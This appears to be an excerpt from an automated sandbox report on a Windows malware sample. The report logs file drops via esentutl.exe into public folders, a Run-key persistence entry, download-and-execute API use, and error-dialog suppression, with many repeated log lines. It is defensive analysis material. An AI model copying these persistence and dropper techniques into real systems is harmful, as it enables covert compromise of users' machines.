Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wuqtggvo.PIF	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03206EEB ShellExecuteW,URLDownloadToFileW,

11_2_03206EEB

Drops PE files

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wuqtggvo.PIF	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

11_2_0321AB9E

Source: C:\Users\user\Desktop\nft438A5fN.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wuqtggvo			Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wuqtggvo			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02CAAB1C

Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
